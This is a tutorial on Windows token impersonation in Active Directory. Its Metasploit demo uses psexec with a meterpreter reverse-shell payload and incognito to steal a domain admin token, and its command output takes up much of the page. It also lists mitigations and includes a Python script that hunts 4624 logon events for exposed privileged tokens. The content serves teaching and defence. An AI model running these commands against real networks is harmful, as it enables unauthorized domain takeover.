Attacks - Active Directory Hacking

Token Impersonation

What are Tokens?

In Windows, an access token is a kernel object that describes the security context of a process or thread: the SID of the user, the SIDs of the groups they belong to, their privileges, and the logon session the token belongs to. Every process runs under a token, and the system checks that token against an object's ACL whenever the process tries to access a resource. A token is created at logon and stays on the host for as long as that logon session (and the processes started in it) exist, so a machine that several users have logged on to holds a token for each of them.

What is Token Impersonation?

Token impersonation is a technique where an attacker who already controls a host (typically as SYSTEM or a local administrator) takes the access token of another user who is logged on to that host and runs code under that user's security context. No password or hash for that user is needed: the token is already on the machine. If the token belongs to a domain admin, the attacker inherits the domain admin's access.

Types of Tokens

Delegate

TL;DR Created for interactive logons (console or RDP); can be used to authenticate to remote systems.

A delegation token is created when a user logs on interactively, either at the console or over RDP. The logon session behind it has the user's credentials available for network authentication, so a process holding the token can access remote resources (file shares, other hosts, the domain controller) as that user. This is the kind of token an attacker wants, because the stolen identity can be used against the rest of the domain and not just on the compromised host. The name comes from the token's impersonation level (SecurityDelegation).

Impersonate

TL;DR Created for "non-interactive" logons such as attaching a network drive or running a domain logon script; usable on the local host only.

An impersonation token is created for non-interactive logons: a network logon to a share, a batch job or a logon script. It lets a process act as that user on the local host only (impersonation level SecurityImpersonation); it cannot be used to authenticate to other systems on the network. Impersonating one still gives the attacker that user's rights on the compromised host, but not a foothold on remote machines.

How does it work?

  1. The attacker gains SYSTEM or local administrator rights on a host, for example with a known user password via psexec as in the demo below.
  2. The attacker lists the tokens of the other users who are logged on to that host (incognito's list_tokens in Metasploit, or Mimikatz's token::list).
  3. The attacker impersonates one of those tokens, so the session now runs in that user's security context.
  4. The attacker acts with that user's rights. With a delegation token of a domain admin this includes authenticating to other hosts and to the domain controller as the admin, without ever having seen the admin's password or hash.

Demo Time

For the demo we assume we already know the password of a user who is a local administrator on the target; psexec needs admin rights there to write its service binary to ADMIN$ and create the service.

Let’s do it with Metasploit:

msfconsole
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.100
set SMBUser user
set SMBDomain lab.local
set SMBPass password
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
exploit

psexec runs its payload as a Windows service, so the meterpreter session we get back is already SYSTEM:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Then load the incognito extension, which provides the token listing and impersonation commands:

load incognito

List the tokens available on the host, grouped by user (-u; use -g to group by group instead):

list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
LAB\xle0x

Impersonate one of them; getuid confirms the session now runs as that user:

impersonate_token "LAB\xle0x"
meterpreter > getuid
Server username: LAB\xle0x

To drop the impersonated token and return to the session's original SYSTEM context:

rev2self

What if a domain admin is logged on to the same host, say over RDP?

list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
LAB\xle0x
LAB\Administrator
impersonate_token "LAB\Administrator"
meterpreter > getuid
Server username: LAB\Administrator

and we are now the domain admin! Since this is a delegation token, it can be used against remote systems too, for example to access the domain controller's shares as LAB\Administrator; an impersonation token would only have given us that identity on this host. Note that we never touched the admin's password or hash: the token was simply left behind by the admin's interactive logon.

Mitigation

  • Local admin restriction: enumerating and stealing other users' tokens requires SYSTEM or local administrator on the host, so keep local admin group membership minimal and do not let ordinary users work as admins.
  • Account tiering: privileged accounts (Domain Admins, Enterprise Admins) only log on to Tier 0 systems (domain controllers, privileged access workstations), never to workstations or member servers. A domain admin who never logs on to a workstation leaves no token there for an attacker to impersonate.
  • Limit user/group token creation permissions: review the user rights assignments that allow creating, assigning and impersonating tokens ("Create a token object", "Replace a process level token", "Impersonate a client after authentication") and grant them only to the accounts and services that need them.
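The tiering mitigation can be checked from logon events, which also makes the mechanism in "How does it work?" concrete: every Security event 4624 for a privileged account on a host outside Tier 0 is a token an attacker with SYSTEM there could impersonate, and the logon type tells you whether it would be a delegation token (usable against the network) or an impersonation token (local only). The script below is an added example and is not code from the original page or from Metasploit/incognito; the host tiers, the list of privileged accounts and the event records are constructed sample data with the fields a SIEM export would carry, and the mapping of logon types to token kinds follows the delegation/impersonation distinction described above.

```python
"""Added example (not part of the original page): hunt for privileged
logons on hosts outside Tier 0 in Windows Security 4624 events.

An attacker with SYSTEM on a host can only impersonate tokens that exist
there, and only delegation tokens (left by interactive logons) let the
stolen identity be used against the rest of the domain. So every 4624
for a privileged account on a non-Tier-0 host is a token worth knowing
about. All data below is constructed sample data, not from a real domain.
"""
from dataclasses import dataclass
from typing import Iterable

# Logon types from Security event 4624 (documented Windows values).
# Interactive-style logons leave a delegation token on the host.
DELEGATION_LOGON_TYPES = {2: "Interactive", 10: "RemoteInteractive", 11: "CachedInteractive"}
# Non-interactive logons leave only an impersonation token (local use only).
IMPERSONATION_LOGON_TYPES = {3: "Network", 4: "Batch", 5: "Service"}

# Assumed environment (constructed): which hosts are Tier 0 and which
# accounts are privileged. In practice feed these from your CMDB and AD.
TIER0_HOSTS = {"DC01", "PAW01"}
PRIVILEGED_USERS = {"Administrator", "da.alice"}

# Constructed 4624/4634 records with the fields a SIEM export would carry.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "WS07", "TargetDomainName": "LAB", "TargetUserName": "xle0x", "LogonType": 2},
    {"EventID": 4624, "Computer": "WS07", "TargetDomainName": "LAB", "TargetUserName": "Administrator", "LogonType": 10},
    {"EventID": 4624, "Computer": "WS07", "TargetDomainName": "LAB", "TargetUserName": "da.alice", "LogonType": 3},
    {"EventID": 4624, "Computer": "DC01", "TargetDomainName": "LAB", "TargetUserName": "Administrator", "LogonType": 2},
    {"EventID": 4624, "Computer": "WS07", "TargetDomainName": "NT AUTHORITY", "TargetUserName": "SYSTEM", "LogonType": 5},
    {"EventID": 4624, "Computer": "WS07", "TargetDomainName": "LAB", "TargetUserName": "WS07$", "LogonType": 3},
    {"EventID": 4634, "Computer": "WS07", "TargetDomainName": "LAB", "TargetUserName": "Administrator", "LogonType": 10},
]


@dataclass(frozen=True)
class Finding:
    host: str
    account: str        # DOMAIN\user, as incognito would list it
    logon_type: int
    token_kind: str     # "delegation", "impersonation" or "unknown"
    severity: str       # "high" if the token works against the network


def token_kind(logon_type: int) -> str:
    """Map a 4624 logon type to the kind of token it leaves on the host."""
    if logon_type in DELEGATION_LOGON_TYPES:
        return "delegation"
    if logon_type in IMPERSONATION_LOGON_TYPES:
        return "impersonation"
    return "unknown"


def is_noise(event: dict) -> bool:
    """Skip machine accounts and built-in identities; they are not the
    user tokens this hunt is about."""
    return (event["TargetUserName"].endswith("$")
            or event["TargetDomainName"].upper() == "NT AUTHORITY")


def hunt(events: Iterable[dict], privileged: set, tier0: set) -> list:
    """Return one Finding per privileged logon on a host outside Tier 0."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or is_noise(ev):
            continue
        if ev["TargetUserName"] not in privileged or ev["Computer"] in tier0:
            continue
        kind = token_kind(ev["LogonType"])
        findings.append(Finding(
            host=ev["Computer"],
            account=f'{ev["TargetDomainName"]}\\{ev["TargetUserName"]}',
            logon_type=ev["LogonType"],
            token_kind=kind,
            # A delegation token lets the stolen identity reach other hosts;
            # an impersonation token only grants that identity locally.
            severity="high" if kind == "delegation" else "medium",
        ))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, PRIVILEGED_USERS, TIER0_HOSTS):
        print(f"[{f.severity}] {f.account} on {f.host}: logon type {f.logon_type} "
              f"leaves a {f.token_kind} token")
```

On the sample data this reports two findings on WS07: LAB\Administrator's RDP logon (type 10, delegation token, high), which is exactly the situation the demo exploits, and LAB\da.alice's network logon (type 3, impersonation token, medium). The Administrator logon on DC01 is not reported because DC01 is Tier 0, and the machine account, SYSTEM and the 4634 logoff record are ignored. Point it at a real export of 4624 events and the list of privileged accounts from AD to find the hosts where a domain admin token is sitting within reach of any local administrator.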